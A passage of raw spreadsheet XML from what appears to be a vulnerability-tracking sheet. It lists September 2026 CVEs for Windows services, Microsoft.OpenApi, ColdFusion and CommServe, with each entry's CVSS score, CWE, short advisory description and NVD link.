t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P754" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q754" s="5" t="inlineStr" /><c r="R754" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S754" s="5" t="inlineStr"><is><t>Null pointer dereference in Windows IKE Extension allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T754" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69881</t></is></c></row><row r="755"><c r="A755" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B755" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C755" s="5" t="inlineStr"><is><t>CVE-2026-69890</t></is></c><c r="D755" s="5" t="n"><v>7.5</v></c><c r="E755" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F755" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G755" s="5" t="inlineStr" /><c r="H755" s="5" t="n"><v>0.003</v></c><c r="I755" s="5" t="inlineStr" /><c r="J755" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K755"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755" s="5" t="inlineStr" /><c r="M755" s="5" t="inlineStr" /><c r="N755" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O755" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P755" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q755" s="5" t="inlineStr" /><c r="R755" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S755" s="5" t="inlineStr"><is><t>Use after free in Windows Virtual Trusted Platform Module allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T755" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69890</t></is></c></row><row r="756"><c r="A756" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B756" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C756" s="5" t="inlineStr"><is><t>CVE-2026-69929</t></is></c><c r="D756" s="5" t="n"><v>7.5</v></c><c r="E756" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F756" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G756" s="5" t="inlineStr" /><c r="H756" s="5" t="n"><v>0.008</v></c><c r="I756" s="5" t="inlineStr" /><c r="J756" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K756" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L756" s="5" t="inlineStr" /><c r="M756" s="5" t="inlineStr" /><c r="N756" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O756" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P756" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q756" s="5" t="inlineStr" /><c r="R756" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S756" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T756" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69929</t></is></c></row><row r="757"><c r="A757" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B757" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C757" s="5" t="inlineStr"><is><t>CVE-2026-69930</t></is></c><c r="D757" s="5" t="n"><v>7.5</v></c><c r="E757" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F757" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G757" s="5" t="inlineStr" /><c r="H757" s="5" t="n"><v>0.008</v></c><c r="I757" s="5" t="inlineStr" /><c r="J757" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K757" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L757" s="5" t="inlineStr" /><c r="M757" s="5" t="inlineStr" /><c r="N757" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O757" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P757" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q757" s="5" t="inlineStr" /><c r="R757" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S757" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T757" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69930</t></is></c></row><row r="758"><c r="A758" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B758" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C758" s="5" t="inlineStr"><is><t>CVE-2026-70065</t></is></c><c r="D758" s="5" t="n"><v>7.5</v></c><c r="E758" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F758" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G758" s="5" t="inlineStr" /><c r="H758" s="5" t="n"><v>0.012</v></c><c r="I758" s="5" t="inlineStr" /><c r="J758" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K758" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L758" s="5" t="inlineStr" /><c r="M758" s="5" t="inlineStr" /><c r="N758" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O758" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P758" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q758" s="5" t="inlineStr" /><c r="R758" s="5" t="inlineStr"><is><t>CWE-401</t></is></c><c r="S758" s="5" t="inlineStr"><is><t>Missing release of memory after effective lifetime in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T758" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70065</t></is></c></row><row r="759"><c r="A759" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B759" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C759" s="5" t="inlineStr"><is><t>CVE-2026-70124</t></is></c><c r="D759" s="5" t="n"><v>7.5</v></c><c r="E759" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F759" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G759" s="5" t="inlineStr" /><c r="H759" s="5" t="n"><v>0.008</v></c><c r="I759" s="5" t="inlineStr" /><c r="J759" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K759" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L759" s="5" t="inlineStr" /><c r="M759" s="5" t="inlineStr" /><c r="N759" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O759" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P759" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q759" s="5" t="inlineStr" /><c r="R759" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S759" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T759" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70124</t></is></c></row><row r="760"><c r="A760" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B760" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C760" s="5" t="inlineStr"><is><t>CVE-2026-70570</t></is></c><c r="D760" s="5" t="n"><v>7.5</v></c><c r="E760" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F760" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G760" s="5" t="inlineStr" /><c r="H760" s="5" t="n"><v>0.004</v></c><c r="I760" s="5" t="inlineStr" /><c r="J760" s="5" t="inlineStr" /><c r="K760" s="5" t="inlineStr" /><c r="L760" s="5" t="inlineStr" /><c r="M760" s="5" t="inlineStr" /><c r="N760" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O760" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P760" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q760" s="5" t="inlineStr" /><c r="R760" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S760" s="5" t="inlineStr"><is><t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t></is></c><c r="T760" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70570</t></is></c></row><row r="761"><c r="A761" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B761" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C761" s="5" t="inlineStr"><is><t>CVE-2026-70579</t></is></c><c r="D761" s="5" t="n"><v>7.5</v></c><c r="E761" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F761" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G761" s="5" t="inlineStr" /><c r="H761" s="5" t="n"><v>0.01</v></c><c r="I761" s="5" t="inlineStr" /><c r="J761" s="5" t="inlineStr" /><c r="K761" s="5" t="inlineStr" /><c r="L761" s="5" t="inlineStr" /><c r="M761" s="5" t="inlineStr" /><c r="N761" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O761" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P761" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q761" s="5" t="inlineStr" /><c r="R761" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S761" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Mobile Broadband allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T761" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70579</t></is></c></row><row r="762"><c r="A762" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B762" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C762" s="5" t="inlineStr"><is><t>CVE-2026-70587</t></is></c><c r="D762" s="5" t="n"><v>7.5</v></c><c r="E762" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F762" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G762" s="5" t="inlineStr" /><c r="H762" s="5" t="n"><v>0.008</v></c><c r="I762" s="5" t="inlineStr" /><c r="J762" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K76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62" s="5" t="inlineStr" /><c r="M762" s="5" t="inlineStr" /><c r="N762" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O762" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P762" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q762" s="5" t="inlineStr" /><c r="R762" s="5" t="inlineStr"><is><t>CWE-170</t></is></c><c r="S762" s="5" t="inlineStr"><is><t>Improper null termination in Windows Remote Desktop Protocol allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T762" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70587</t></is></c></row><row r="763"><c r="A763" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B763" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C763" s="5" t="inlineStr"><is><t>CVE-2026-71330</t></is></c><c r="D763" s="5" t="n"><v>7.5</v></c><c r="E763" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F763" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G763" s="5" t="inlineStr" /><c r="H763" s="5" t="n"><v>0.008</v></c><c r="I763" s="5" t="inlineStr" /><c r="J763" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K76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63" s="5" t="inlineStr" /><c r="M763" s="5" t="inlineStr" /><c r="N763" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O763" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P763" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q763" s="5" t="inlineStr" /><c r="R763" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S763" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T763" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71330</t></is></c></row><row r="764"><c r="A764" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B764" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C764" s="5" t="inlineStr"><is><t>CVE-2026-72923</t></is></c><c r="D764" s="5" t="n"><v>7.5</v></c><c r="E764" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F764" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G764" s="5" t="inlineStr" /><c r="H764" s="5" t="n"><v>0.012</v></c><c r="I764" s="5" t="inlineStr" /><c r="J764" s="5" t="inlineStr" /><c r="K764" s="5" t="inlineStr" /><c r="L764" s="5" t="inlineStr" /><c r="M764" s="5" t="inlineStr" /><c r="N764" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O764" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P764" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q764" s="5" t="inlineStr" /><c r="R764" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="S764" s="5" t="inlineStr"><is><t>In Microsoft.OpenApi.YamlReader from 2.0.0-preview.11 until 2.12.0 and from 3.0.0 until 3.10.0, and in Microsoft.OpenApi.Readers prior to 1.6.30, a small YAML OpenAPI document containing nested anchors and aliases can cause uncontrolled resource consumption when parsed through the public YAML reader APIs. YAML is parsed through SharpYaml, which represents aliases as shared nodes in a directed acyclic graph, so the parsed YAML graph stays small, but converting that graph to System.Text.Json.Nodes.JsonNode requires every alias to be materialized as an independent node because a JsonNode cannot be attached to multiple parents. Without a bound on that conversion work, a document with N nested anchors each referenced k times can require k^N materialized JSON nodes, leading to excessive memory allocation and process termination through out-of-memory conditions, a billion laughs style denial of service. The patched versions bound the YAML-to-JSON conversion by node count and nesting depth and report an OpenApiDiagnostic error instead of expanding without limit. This vulnerability is fixed in Microsoft.OpenApi.YamlReader 2.12.0 and 3.10.0, and Microsoft.OpenApi.Readers 1.6.30.</t></is></c><c r="T764" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72923</t></is></c></row><row r="765"><c r="A765" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B765" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C765" s="5" t="inlineStr"><is><t>CVE-2026-72928</t></is></c><c r="D765" s="5" t="n"><v>7.5</v></c><c r="E765" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F765" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G765" s="5" t="inlineStr" /><c r="H765" s="5" t="n"><v>0.006</v></c><c r="I765" s="5" t="inlineStr" /><c r="J765" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K765" s="5" t="inlineStr"><is><t>microsoft:windows_server_2025</t></is></c><c r="L765" s="5" t="inlineStr" /><c r="M765" s="5" t="inlineStr" /><c r="N765" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O765" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P765" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q765" s="5" t="inlineStr" /><c r="R765" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S765" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an authorized attacker to execute code over a network.</t></is></c><c r="T765" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72928</t></is></c></row><row r="766"><c r="A766" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B766" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C766" s="5" t="inlineStr"><is><t>CVE-2026-72932</t></is></c><c r="D766" s="5" t="n"><v>7.5</v></c><c r="E766" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F766" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G766" s="5" t="inlineStr" /><c r="H766" s="5" t="n"><v>0.01</v></c><c r="I766" s="5" t="inlineStr" /><c r="J766" s="5" t="inlineStr" /><c r="K766" s="5" t="inlineStr" /><c r="L766" s="5" t="inlineStr" /><c r="M766" s="5" t="inlineStr" /><c r="N766" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O766" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P766" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q766" s="5" t="inlineStr" /><c r="R766" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S766" s="5" t="inlineStr"><is><t>Buffer over-read in Windows Message Queuing Queue Manager allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T766" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72932</t></is></c></row><row r="767"><c r="A767" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B767" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C767" s="5" t="inlineStr"><is><t>CVE-2026-72943</t></is></c><c r="D767" s="5" t="n"><v>7.5</v></c><c r="E767" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F767" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G767" s="5" t="inlineStr" /><c r="H767" s="5" t="n"><v>0.006</v></c><c r="I767" s="5" t="inlineStr" /><c r="J767" s="5" t="inlineStr" /><c r="K767" s="5" t="inlineStr" /><c r="L767" s="5" t="inlineStr" /><c r="M767" s="5" t="inlineStr" /><c r="N767" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O767" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P767" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q767" s="5" t="inlineStr" /><c r="R767" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S767" s="5" t="inlineStr"><is><t>Use after free in Windows Deployment Services allows an authorized attacker to execute code over a network.</t></is></c><c r="T767" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72943</t></is></c></row><row r="768"><c r="A768" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B768" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C768" s="5" t="inlineStr"><is><t>CVE-2026-72949</t></is></c><c r="D768" s="5" t="n"><v>7.5</v></c><c r="E768" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F768" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G768" s="5" t="inlineStr" /><c r="H768" s="5" t="n"><v>0.011</v></c><c r="I768" s="5" t="inlineStr" /><c r="J768" s="5" t="inlineStr" /><c r="K768" s="5" t="inlineStr" /><c r="L768" s="5" t="inlineStr" /><c r="M768" s="5" t="inlineStr" /><c r="N768" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O768" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P768" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q768" s="5" t="inlineStr" /><c r="R768" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S768" s="5" t="inlineStr"><is><t>Null pointer dereference in Windows SMB Server Network Transport Driver (srvnet.sys) allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T768" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72949</t></is></c></row><row r="769"><c r="A769" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B769" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C769" s="5" t="inlineStr"><is><t>CVE-2026-72954</t></is></c><c r="D769" s="5" t="n"><v>7.5</v></c><c r="E769" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F769" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G769" s="5" t="inlineStr" /><c r="H769" s="5" t="n"><v>0.006</v></c><c r="I769" s="5" t="inlineStr" /><c r="J769" s="5" t="inlineStr" /><c r="K769" s="5" t="inlineStr" /><c r="L769" s="5" t="inlineStr" /><c r="M769" s="5" t="inlineStr" /><c r="N769" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O769" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P769" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q769" s="5" t="inlineStr" /><c r="R769" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S769" s="5" t="inlineStr"><is><t>Use after free in Windows Deployment Services allows an authorized attacker to execute code over a network.</t></is></c><c r="T769" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72954</t></is></c></row><row r="770"><c r="A770" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B770" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C770" s="5" t="inlineStr"><is><t>CVE-2026-72989</t></is></c><c r="D770" s="5" t="n"><v>7.5</v></c><c r="E770" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F770" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G770" s="5" t="inlineStr" /><c r="H770" s="5" t="n"><v>0.008</v></c><c r="I770" s="5" t="inlineStr" /><c r="J770" s="5" t="inlineStr" /><c r="K770" s="5" t="inlineStr" /><c r="L770" s="5" t="inlineStr" /><c r="M770" s="5" t="inlineStr" /><c r="N770" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O770" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P770" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q770" s="5" t="inlineStr" /><c r="R770" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S770" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows Failover Cluster allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T770" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72989</t></is></c></row><row r="771"><c r="A771" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B771" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C771" s="5" t="inlineStr"><is><t>CVE-2026-73017</t></is></c><c r="D771" s="5" t="n"><v>7.5</v></c><c r="E771" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F771" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G771" s="5" t="inlineStr" /><c r="H771" s="5" t="n"><v>0.002</v></c><c r="I771" s="5" t="inlineStr" /><c r="J771" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K771"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771" s="5" t="inlineStr" /><c r="M771" s="5" t="inlineStr" /><c r="N771" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O771" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P771" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q771" s="5" t="inlineStr" /><c r="R771" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S771" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Graphics Kernel allows an authorized attacker to execute code locally.</t></is></c><c r="T771" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73017</t></is></c></row><row r="772"><c r="A772" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B772" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C772" s="5" t="inlineStr"><is><t>CVE-2026-75998</t></is></c><c r="D772" s="5" t="n"><v>7.5</v></c><c r="E772" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F772" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G772" s="5" t="inlineStr" /><c r="H772" s="5" t="n"><v>0.006</v></c><c r="I772" s="5" t="inlineStr" /><c r="J772" s="5" t="inlineStr" /><c r="K772" s="5" t="inlineStr" /><c r="L772" s="5" t="inlineStr" /><c r="M772" s="5" t="inlineStr" /><c r="N772" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O772" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P772" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q772" s="5" t="inlineStr" /><c r="R772" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S772" s="5" t="inlineStr"><is><t>ColdFusion is affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could exploit this vulnerability to access sensitive files and directories outside the intended access scope. Exploitation of this issue does not require user interaction.</t></is></c><c r="T772" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75998</t></is></c></row><row r="773"><c r="A773" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B773" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C773" s="5" t="inlineStr"><is><t>CVE-2026-77101</t></is></c><c r="D773" s="5" t="n"><v>7.5</v></c><c r="E773" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F773" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G773" s="5" t="inlineStr" /><c r="H773" s="5" t="n"><v>0.003</v></c><c r="I773" s="5" t="inlineStr" /><c r="J773" s="5" t="inlineStr" /><c r="K773" s="5" t="inlineStr"><is><t>commvault:commvault, linux:linux_kernel, microsoft:windows</t></is></c><c r="L773" s="5" t="inlineStr" /><c r="M773" s="5" t="inlineStr" /><c r="N773" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O773" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P773" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q773" s="5" t="inlineStr" /><c r="R773" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S773" s="5" t="inlineStr"><is><t>CommServe contained a stack-based buffer overflow issue affecting service availability. Software customers upgrade to resolved maintenance release. Update CommServe.</t></is></c><c r="T773" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77101</t></is></c></row><row r="774"><c r="A774" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B774" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C774" s="5" t="inlineStr"><is><t>CVE-2026-77102</t></is></c><c r="D774" s="5" t="n"><v>7.5</v></c><c r="E774" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F774" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G774" s="5" t="inlineStr" /><c r="H774" s="5" t="n"><v>0.003</v></c><c r="I774" s="5" t="inlineStr" /><c r="J774" s="5" t="inlineStr" /><c r="K774" s="5" t="inlineStr"><is><t>commvault:commvault, linux:linux_kernel, microsoft:windows</t></is></c><c r="L774" s="5" t="inlineStr" /><c r="M774" s="5" t="inlineStr" /><c r="N774" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O774" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P774" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q774" s="5" t="inlineStr" /><c r="R774" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S774" s="5" t="inlineStr"><is><t>CommServe contained a heap-based buffer overflow issue affecting service availability. Software customers upgrade to resolved maintenance release. Update CommServe.</t></is></c><c r="T774" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77102</t></is></c></row><row r="775"><c r="A775" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B775" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C775" s="5" t="inlineStr"><is><t>CVE-2026-77103</t></is></c><c r="D775" s="5" t="n"><v>7.5</v></c><c r="E775" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F775" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G775" s="5" t="inlineStr" /><c r="H775" s="5" t="n"><v>0.003</v></c><c r="I775" s="5" t="inlineStr" /><c r="J775" s="5" t="inlineStr" /><c r="K775" s="5" t="inlineStr"><is><t>commvault:commvault, linux:linux_kernel, microsoft:windows</t></is></c><c r="L775" s="5" t="inlineStr" /><c r="M775" s="5" t="inlineStr" /><c r="N775" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O775" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P775" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q775" s="5" t="inlineStr" /><c r="R775" s="5" t="inlineStr"><is><t>CWE-288</t></is></c><c r="S775" s="5" t="inlineStr"><is><t>CommServe contained an authentication bypass issue affecting access authorization and information disclosure. Software customers upgrade to resolved maintenance release. Update CommServe.</t></is></c><c r="T775" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77103</t></is></c></row><row r="776"><c r="A776" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B776" s="5" 